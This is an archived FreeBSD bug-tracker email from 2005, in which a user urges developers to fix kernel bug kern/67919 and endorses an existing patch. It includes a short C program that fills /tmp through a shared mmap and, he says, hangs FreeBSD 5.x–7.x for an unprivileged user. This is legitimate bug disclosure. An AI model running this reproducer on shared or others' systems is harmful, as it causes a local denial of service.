Date: Mon, 31 Oct 2005 07:20:13 GMT From: "Cai, Quanqing" <caiquanqing@gmail.com> To: freebsd-bugs@FreeBSD.org Subject: Re: kern/67919: Why nobody take serious to fix this bug? Message-ID: <200510310720.j9V7KDX9070428@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
The following reply was made to PR kern/67919; it has been noted by GNATS. From: "Cai, Quanqing" <caiquanqing@gmail.com> To: freebsd-current@freebsd.org, bug-followup@FreeBSD.org Cc: Igor Sysoev <is@rambler-co.ru>, Edwin Groothuis <edwin@mavetju.org>, Uwe Doering <gemini@geminix.org> Subject: Re: kern/67919: Why nobody take serious to fix this bug? Date: Sun, 30 Oct 2005 21:28:22 -0800 ------=_Part_29858_5728121.1130736502398 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Today I happened to read this message on freebsd-stable: http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html After I read all messages and related links, I feel so frustrating, why nobody take serious to fix this bug even we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System goes no response so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me:( If you guy= s don't like this patch, please give out a reason and come out a better patch or solution. For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you have to increase FILELEN to a size greater than your /tmp partition: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #include <stdio.h> #include <fcntl.h> #include <unistd.h> #include <err.h> #include <sys/types.h> #include <sys/mman.h> #define FILENAME "/tmp/test" /* where to put the test file */ #define FILELEN 710 /* test file length in MB */ main() { int fd; size_t len; char *buf, *p, *lim; len =3D FILELEN * 1024 * 1024; if ((fd =3D open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) =3D=3D -1) err(2, "open() failed"); if (ftruncate(fd, len) =3D=3D -1) err(2, "ftruncate() failed"); buf =3D mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0); if (buf =3D=3D MAP_FAILED) err(2, "mmap() failed"); (void)close(fd); for (p =3D buf, lim =3D p + len; p < lim; p +=3D 4096) *p =3D '0'; if (munmap(buf, len) =3D=3D -1) err(2, "munmap() failed"); exit(0); } =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D Cai, Quanqing ------=_Part_29858_5728121.1130736502398 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline Today I happened to read this message on freebsd-stable: <a href=3D"http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/0= 19086.html">http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/= 019086.html</a><br> <br> After I read all messages and related links, I feel so frustrating, why nobody take serious to fix this bug even we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! System goes no response so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me:( If you guys don't like this patch, please give out a reason and come out a better patch or solution.<br> <br> For impatience, you can run this to crush your system(7.x, 6.x, 5.x), you have to increase FILELEN to a size greater than your /tmp partition:<br= > <br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> #include <stdio.h><br> #include <fcntl.h><br> #include <unistd.h><br> #include <err.h><br> #include <sys/types.h><br> #include <sys/mman.h><br> <br> #define FILENAME "/tmp/test&= quot; /* where to put the test file */<br> #define FILELEN 710 /* test file length in MB */<br> <br> main()<br> {<br> int fd;<br> size_t len;<br> char *buf, *p, *lim;<br> <br> len =3D FILELEN * 1024 * 1024;<b= r> <br> if ((fd =3D open(FILENAME, O_RDW= R|O_CREAT|O_TRUNC, 0666)) =3D=3D -1)<br> &nb= sp; err(2, "open() failed");<br> <br> if (ftruncate(fd, len) =3D=3D -1= )<br> &nb= sp; err(2, "ftruncate() failed");<br> <br> buf =3D mmap(NULL, len, PROT_WRI= TE, MAP_SHARED, fd, 0);<br> if (buf =3D=3D MAP_FAILED)<br> &nb= sp; err(2, "mmap() failed");<br> (void)close(fd);<br> <br> for (p =3D buf, lim =3D p + len;= p < lim; p +=3D 4096)<br> &nb= sp; *p =3D '0';<br> <br> if (munmap(buf, len) =3D=3D -1)<= br> &nb= sp; err(2, "munmap() failed");<br> <br> exit(0);<br> }<br> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br> <br> <br> Cai, Quanqing<br> ------=_Part_29858_5728121.1130736502398--
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200510310720.j9V7KDX9070428>